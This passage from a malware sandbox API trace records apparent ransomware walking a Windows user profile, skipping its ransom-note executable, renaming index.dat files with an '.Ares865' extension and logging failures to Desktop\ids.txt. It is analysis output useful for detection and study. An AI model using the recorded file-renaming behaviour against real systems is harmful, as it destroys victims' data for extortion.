ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSHist012019091320190914", cAlternateFileName="MSHIST~1")) returned 1 [0105.894] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0105.895] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="aoldtz.exe") returned 1 [0105.895] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865") returned 226 [0105.895] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat.ares865"), dwFlags=0x1) returned 0 [0105.895] GetLastError () returned 0x20 [0105.895] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 248 [0105.895] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 248 [0105.895] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0105.896] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6ad6 [0105.896] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xf8, lpOverlapped=0x0) returned 1 [0105.896] CloseHandle (hObject=0x118) returned 1 [0105.896] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0105.897] CloseHandle (hObject=0x0) returned 0 [0105.897] CloseHandle (hObject=0x0) returned 0 [0105.897] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3897c980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x83c55340, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0105.897] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0105.897] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a30 [0105.904] wsprintfA (in: param_1=0x2ccebc8, param_2="[ERROR] %S FindFirstFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\* FindFirstFile error 3\r\n") returned 292 [0105.904] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715\\* FindFirstFile error 3\r\n") returned 292 [0105.904] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0105.904] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6bce [0105.904] WriteFile (in: hFile=0x120, lpBuffer=0x2ccebc8*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x2cce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ccebc8*, lpNumberOfBytesWritten=0x2cce0b4*=0x124, lpOverlapped=0x0) returned 1 [0105.905] CloseHandle (hObject=0x120) returned 1 [0105.905] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79f0 [0105.906] wsprintfA (in: param_1=0x2ccebc8, param_2="[ERROR] %S FindFirstFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\* FindFirstFile error 3\r\n") returned 292 [0105.906] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\* FindFirstFile error 3\r\n") returned 292 [0105.906] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0105.906] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6cf2 [0105.906] WriteFile (in: hFile=0x120, lpBuffer=0x2ccebc8*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x2cce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ccebc8*, lpNumberOfBytesWritten=0x2cce0b4*=0x124, lpOverlapped=0x0) returned 1 [0105.907] CloseHandle (hObject=0x120) returned 1 [0105.907] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7790 [0105.912] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865") returned 235 [0105.912] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0105.912] GetLastError () returned 0x20 [0105.912] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 257 [0105.912] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 257 [0105.912] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0105.913] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6e16 [0105.913] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x101, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x101, lpOverlapped=0x0) returned 1 [0105.913] CloseHandle (hObject=0x118) returned 1 [0105.913] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0105.913] CloseHandle (hObject=0x0) returned 0 [0105.913] CloseHandle (hObject=0x0) returned 0 [0105.913] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6b6382a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b6382a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MM5O9XQS", cAlternateFileName="")) returned 1 [0105.913] lstrcmpiW (lpString1="MM5O9XQS", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0105.913] lstrcmpiW (lpString1="MM5O9XQS", lpString2="aoldtz.exe") returned 1 [0106.005] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865") returned 218 [0106.005] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0106.006] GetLastError () returned 0x20 [0106.006] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 240 [0106.006] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 240 [0106.006] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0106.007] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6f17 [0106.007] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xf0, lpOverlapped=0x0) returned 1 [0106.008] CloseHandle (hObject=0x118) returned 1 [0106.008] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0106.008] CloseHandle (hObject=0x0) returned 0 [0106.008] CloseHandle (hObject=0x0) returned 0 [0106.008] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSHist012019091320190914", cAlternateFileName="MSHIST~1")) returned 1 [0106.008] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0106.008] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="aoldtz.exe") returned 1 [0106.009] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865") returned 243 [0106.009] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat.ares865"), dwFlags=0x1) returned 0 [0106.009] GetLastError () returned 0x20 [0106.009] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 265 [0106.009] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 265 [0106.009] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0106.009] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7007 [0106.009] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x109, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x109, lpOverlapped=0x0) returned 1 [0106.010] CloseHandle (hObject=0x118) returned 1 [0106.010] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0106.010] CloseHandle (hObject=0x0) returned 0 [0106.010] CloseHandle (hObject=0x0) returned 0 [0106.010] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3897c980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x83c55340, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0106.010] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0106.010] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a50 [0106.039] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865") returned 235 [0106.039] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0106.039] GetLastError () returned 0x20 [0106.039] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 257 [0106.039] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\index.dat MoveFileEx error 32\r\n") returned 257 [0106.039] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0106.040] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7110 [0106.040] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x101, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x101, lpOverlapped=0x0) returned 1 [0106.040] CloseHandle (hObject=0x118) returned 1 [0106.040] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0106.041] CloseHandle (hObject=0x0) returned 0 [0106.041] CloseHandle (hObject=0x0) returned 0 [0106.041] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dd91240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dd91240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSHist012019091320190914", cAlternateFileName="MSHIST~1")) returned 1 [0106.041] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0106.041] lstrcmpiW (lpString1="MSHist012019091320190914", lpString2="aoldtz.exe") returned 1 [0106.041] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865") returned 260 [0106.041] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\mshist012019091320190914\\index.dat.ares865"), dwFlags=0x1) returned 0 [0106.041] GetLastError () returned 0x20 [0106.041] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 282 [0106.041] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\MSHist012019091320190914\\index.dat MoveFileEx error 32\r\n") returned 282 [0106.041] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0106.042] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7211 [0106.042] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x11a, lpOverlapped=0x0) returned 1 [0106.042] CloseHandle (hObject=0x118) returned 1 [0106.043] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0106.043] CloseHandle (hObject=0x0) returned 0 [0106.043] CloseHandle (hObject=0x0) returned 0 [0106.043] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3897c980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3897c980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x83c55340, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 0 [0106.043] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0106.043] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a70 [0106.069] wsprintfA (in: param_1=0x2ccebc8, param_2="[ERROR] %S FindFirstFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\* FindFirstFile error 3\r\n") returned 292 [0106.069] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\* FindFirstFile error 3\r\n") returned 292 [0106.069] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.070] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x732b [0106.070] WriteFile (in: hFile=0x120, lpBuffer=0x2ccebc8*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x2cce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ccebc8*, lpNumberOfBytesWritten=0x2cce0b4*=0x124, lpOverlapped=0x0) returned 1 [0106.070] CloseHandle (hObject=0x120) returned 1 [0106.070] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a50 [0106.071] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: 